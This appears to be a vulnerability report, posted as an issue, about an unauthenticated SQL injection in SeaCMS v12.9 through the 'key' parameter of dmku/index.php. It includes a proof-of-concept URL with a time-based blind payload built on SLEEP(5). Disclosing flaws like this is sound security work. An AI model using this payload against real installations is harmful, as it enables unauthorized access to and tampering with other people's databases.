CMS icon indicating copy to clipboard operation
CMS copied to clipboard

Unauthenticated SQL Injection in SeaCMS v12.9

Open Tddddddddd opened this issue 1 year ago • 0 comments

Summary SeaCMS v12.9 suffers from an unauthenticated SQL injection vulnerability in the dmku/index.php file where user-supplied data is used directly in an SQL query without proper sanitization. No filtering found in source code image Proof of Concept (PoC) http(s)://ip:port//js/player/dmplayer/dmku/?ac=so&key=1&type=list 微信图片_20240611101737 http(s)://ip:port//js/player/dmplayer/dmku/?ac=so&key=1' AND (SELECT 1806 FROM (SELECT(SLEEP(5)))npVX)-- OXgJ&type=list image Impact This vulnerability allows unauthenticated remote attackers to inject arbitrary SQL commands through the "key" parameter.

Tddddddddd avatar Jun 11 '24 02:06 Tddddddddd